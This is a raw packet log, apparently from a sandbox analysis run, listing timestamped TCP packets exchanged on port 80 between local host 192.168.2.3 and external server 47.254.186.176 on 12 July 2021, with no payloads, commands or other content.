Jul 12, 2021 10:28:46.452924967 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.452948093 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.452971935 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.453092098 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.453144073 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.453176022 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.453198910 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.453219891 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.453244925 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.453250885 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.453269958 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.453289032 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.453305960 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.453327894 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.453353882 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.453361034 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.453383923 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.453401089 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.453430891 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.453452110 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.453474045 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.453481913 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.453502893 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.453521967 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.453530073 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.453567982 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.453577995 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.453598022 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.453619003 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.453641891 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.453648090 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.453670979 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.453685045 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.454178095 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.454207897 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.454226971 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.454255104 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.454263926 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.454279900 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.454296112 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.454318047 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.454339981 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.454349995 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.454382896 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.454390049 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.454413891 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.454466105 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.454611063 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.454638004 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.454660892 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.454689980 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.454782009 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.454807043 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.454827070 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.454838991 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.454870939 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.454886913 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.454927921 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.454950094 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.454976082 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.454982996 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.455008030 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.455023050 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.455046892 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.455073118 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.455091953 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.455108881 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.455151081 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.455163002 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.455184937 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.455207109 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.455225945 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.455235958 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.455256939 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.455271006 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.455415964 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.455449104 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.455476046 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.455483913 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.455506086 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.455519915 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.455535889 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.455557108 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.455579996 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.455586910 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.455610037 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.455630064 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.455640078 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.455661058 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.455682993 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.455693007 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.455717087 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.455737114 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.455749035 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.455771923 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.455789089 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.455804110 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.455852032 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.456268072 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.456293106 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.456315994 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.456338882 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.456348896 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.456368923 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.456388950 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.456399918 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.456425905 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.456446886 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.456463099 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.456484079 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.456496000 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.456516027 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.456537008 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.456558943 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.456583023 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.456604958 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.456614971 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.456780910 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.456832886 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.457019091 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.457046032 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.457068920 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.457093954 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.457106113 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.457132101 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.457148075 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.457166910 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.457190037 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.457211971 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.457222939 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.457247972 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.457268000 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.457405090 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.457432985 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.457461119 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.457479954 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.457501888 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.457525969 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.457535982 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.457561016 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.457578897 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.457595110 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.457622051 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.457644939 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.457658052 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.457678080 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.457699060 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.457714081 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.457761049 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.457942009 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.461565971 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.461601973 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.461627007 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.461651087 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.461666107 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.461683035 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.461895943 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.461946964 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.462014914 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.462034941 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.462080956 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.462106943 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.462132931 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.462157011 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.462182999 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.462213993 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.462220907 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.462248087 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.462268114 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.462285995 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.462296009 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.462321997 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.462346077 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.462366104 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.462415934 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.462459087 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.462471008 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.462498903 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.462544918 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.462551117 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.462574005 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.462610960 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.462622881 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.462661028 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.462685108 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.462707996 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.462718010 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.462742090 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.462760925 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.462774038 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.462796926 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.462821960 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.462831020 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.462855101 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.462871075 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.462892056 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.462919950 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.462940931 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.462958097 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.462982893 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.463004112 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.463016033 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.463040113 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.463057041 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.463073969 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.463099003 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.463130951 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.463150024 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.463174105 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.463192940 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.463210106 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.463233948 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.463252068 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.463270903 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.463315010 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.463618040 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.463644028 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.463690996 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.463697910 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.463726997 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.463752985 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.463771105 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.463790894 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.463815928 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.463831902 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.463854074 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.463881016 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.463898897 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.463920116 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.463944912 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.463967085 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.463979006 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.464003086 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.464021921 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.464035034 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.464059114 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.464078903 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.464132071 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.464155912 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.464178085 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.464188099 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.464211941 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.464231014 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.464242935 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.464284897 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.464709044 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.464737892 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.464757919 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.464776993 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.464798927 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.464817047 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.464837074 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.464876890 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.464894056 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.464904070 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.464926958 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.464973927 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.464989901 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.465013981 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.465035915 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.465061903 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.465290070 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.465315104 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.465336084 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.465352058 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.465385914 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.465408087 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.465460062 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.465514898 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.465523005 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.465593100 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.465637922 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.465826035 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.465852976 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.465893030 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.465904951 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.465934992 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.465960026 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.465982914 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.465995073 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.466013908 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.466044903 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.466065884 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.466111898 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.466149092 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.466303110 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.466356039 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.466604948 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.466658115 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.466685057 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.466711044 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.466720104 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.466742992 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.466768980 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.466775894 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.466814995 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.466829062 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.466850042 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.466870070 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.466890097 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.466898918 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.466922045 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.466947079 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.466953993 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.466974974 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.466995955 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.467211008 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.467237949 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.467261076 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.467288017 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.467308998 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.467327118 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.467353106 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.467381001 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.467426062 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.467452049 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.467473984 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.467545986 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.467592955 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.467689037 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.467766047 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.467787981 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.467809916 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.467820883 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.467855930 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.467933893 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.467959881 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.467983007 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.468004942 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.468020916 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.468061924 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.468094110 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.468167067 CEST	80	49720	47.254.186.176	192.168.2.3
